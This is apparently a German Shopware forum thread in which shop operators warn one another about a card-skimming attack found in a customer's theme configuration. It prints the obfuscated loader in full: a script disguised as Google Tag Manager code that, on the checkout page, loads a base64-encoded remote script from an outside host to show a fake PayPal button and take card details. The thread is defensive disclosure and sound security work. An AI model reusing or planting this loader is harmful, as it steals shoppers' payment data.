Schadenscode / JS Integration

Hallo zusammen,
bei einem unseren Kunden ist ein Schadenscode in der Theme Konfiguration / eigenes JS hinterlegt worden.
Und zwar hat irgendjemand diesen JS Code hinterlegt:

<!-- Google Tag Manager -->
<script>
(function(n,x,b,z,i,y,m,o){z[‘GoogleAnalyticsObjects’]=o;y=i.createElement (x),n=i.getElementsByTagName(x)[0];if(b.href.match(new RegExp(atob(o)))){y.async=1;y.src=‘//’+z.atob(m);n.parentNode.insertBefore(y,n)}}) (‘fu’,‘script’,window.location,window,document,‘[//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=](https://ottscho-it.slack.com//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=)’);
</script>

Analysiert man dies, so wird folgendes Script geladen.
https://webstatics.org/trustbadge/DE.1bc5594646596f40faa8.chunk.js

Das Ganze hat zu Folge, dass ein Fake Paypal Checkout Button angezeigt wurde und Kreditkartendaten abgegriffen wurden. Wer auch immer das gemacht hat muss Ahnung von Shopware haben. Es war sehr auf Shopware zugeschnitten und die Platzierung erfordert auch Ahnung.

Ebenfalls der Dateiname vom eig. Script mit trustbadge…

Evtl. schaut ihr mal in euren Shops nach, ob ihr was ähnliches (ich hoffe nicht) habt.

@Moritz_Naczenski
Evtl. könnt ihr einen Newsletter machen. Ich denke es ist ein wichtiges Thema.

Viele Grüße
Benjamin

1 „Gefällt mir“

Danke, Benny. Ich schau mal, was man da machen kann. Hast Du herausbekommen können, wie der Einstieg passierte? Bzw. was habt Ihr denn getan, um das einzudämmen? Hat Änderung von FTP-Zugangsdaten ausgereicht?

Hi Marco,
Backend Login und ne dann beim Theme Manager / Konfiguration eingetragen.

1 „Gefällt mir“

Backend Login ist nur eine Vermutung. Und es wurde wie folgt eingetragen

@daniel.naumann : Ist das hier der gleiche Fall wie der vom Threadersteller oder ist das eine weitere Meldung ?

Grüße

Vermutlich unterschiedlich, da es einen eigenen Thread gibt: Shopware spezifische Malware gefunden

Der gleiche, fehlende interne Absprache wer den Thread schreibt :smiley: aber lesen es ein paar doppelt als eine(r) zu wenig. :slight_smile:

Info an Shopbetreiber ist raus. Danke für den Hinweis!